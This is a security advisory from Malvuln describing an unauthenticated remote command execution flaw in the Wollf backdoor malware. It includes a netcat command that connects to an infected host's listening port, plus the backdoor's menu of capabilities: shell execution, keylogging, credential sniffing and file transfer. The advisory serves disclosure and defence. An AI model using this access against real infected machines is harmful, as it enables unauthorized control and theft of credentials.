Discovery / credits: Malvuln - (c) 2022  
Original source:  
Threat: Backdoor.Win32.Wollf.h  
Vulnerability: Unauthenticated Remote Command Execution  
Description: The malware runs with SYSTEM integrity and listens on TCP port 7614. Third-party adversaries who can reach an infected host can run commands made available by the backdoor.  
Family: Wollf  
Type: PE32  
MD5: 867c6b432ccd4aa51adc5e2722a4b144  
Vuln ID: MVID-2022-0530  
Dropped files: wrm.exe  
Disclosure: 04/02/2022  
c:\>nc64.exe x.x.x.x 7614  
"Wollf Remote Manager" v1.6  
Code by wollf,  
DOS Switch to MS-DOS prompt  
DIR/LS/LIST Directory and file list  
CD Entry directory  
MD/MKDIR Make directory  
PWD Get current dirctory  
COPY/CP Copy file  
DEL/RM Delete directory/file  
REN/RENAME Rename file  
MOVE/MV Move file  
TYPE/CAT Type text file  
POPMSG Popup message box  
SYSINFO Get system information  
WHO/W Get current connections  
SHELL Execute command by system shell(cmd.exe)  
EXEC/RUN Execute file by windows API(WinExec)  
WS Windows list  
PS Process list  
KILL Kill process  
GET/GETFILE Download file from remote machine  
PUT/PUTFILE Upload file to remote machine  
WGET Get file from web server  
FGET Get file from ftp server  
FPUT Put file to ftp server  
TELNET Connect to other host  
FTPD Start ftp service  
TELNETD/TELD/EXPORT Start telnet service (export shell)  
REDIR Redirect tcp data from <Port> to <Dest_host:Dest_port>  
REDIR_STOP Stop redirect tcp data  
SNIFF Sniff ftp/smtp/pop3/http password what via ethernet  
SNIFF_STOP Stop ethernet sniffer  
KEYLOG Start keyboard record  
KEYLOG_STOP Stop keyboard record  
REBOOT Reboot windows  
SHUTDOWN Shutdown windows  
EXIT Close current connection  
QUIT Close all connection and abort service  
REMOVE Remove service  
VER/VERSION Version information  
HELP/H/? Show help message  
Type "HELP | MORE" for multipage display.  
Command "HELP" succeed.  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) (TM).